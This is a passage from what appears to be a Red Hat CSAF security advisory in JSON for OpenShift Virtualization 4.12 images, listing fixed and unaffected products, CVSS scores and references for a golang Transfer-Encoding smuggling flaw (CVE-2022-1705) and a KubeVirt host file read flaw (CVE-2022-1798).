"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2107374"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in golang. The HTTP/1 client accepted invalid Transfer-Encoding headers indicating \"chunked\" encoding. This issue could allow request smuggling, but only if combined with an intermediate server that also improperly accepts the header as invalid.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: net/http: improper sanitization of Transfer-Encoding header",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64"
],
"known_not_affected": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2022-1705"
},
{
"category": "external",
"summary": "RHBZ#2107374",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2022-1705",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1705"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-1705",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1705"
},
{
"category": "external",
"summary": "https://go.dev/issue/53188",
"url": "https://go.dev/issue/53188"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE",
"url": "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE"
}
],
"release_date": "2022-07-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2023-01-25T11:11:29+00:00",
"details": "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2023:0408"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: net/http: improper sanitization of Transfer-Encoding header"
},
{
"acknowledgments": [
{
"names": [
"Oliver Brooks and James Klopchic"
],
"organization": "NCC Group"
}
],
"cve": "CVE-2022-1798",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2022-08-12T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2117872"
}
],
"notes": [
{
"category": "description",
"text": "An arbitrary file read vulnerability was found in the kubeVirt API. This flaw makes it possible to use the kubeVirt API to provide access to host files (like /etc/passwd, for example) in a KubeVirt VM as a disk device that can be written to and read from.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kubeVirt: Arbitrary file read on the host from KubeVirt VMs",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64"
],
"known_not_affected": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
},
"references": [
{
"category": "self",
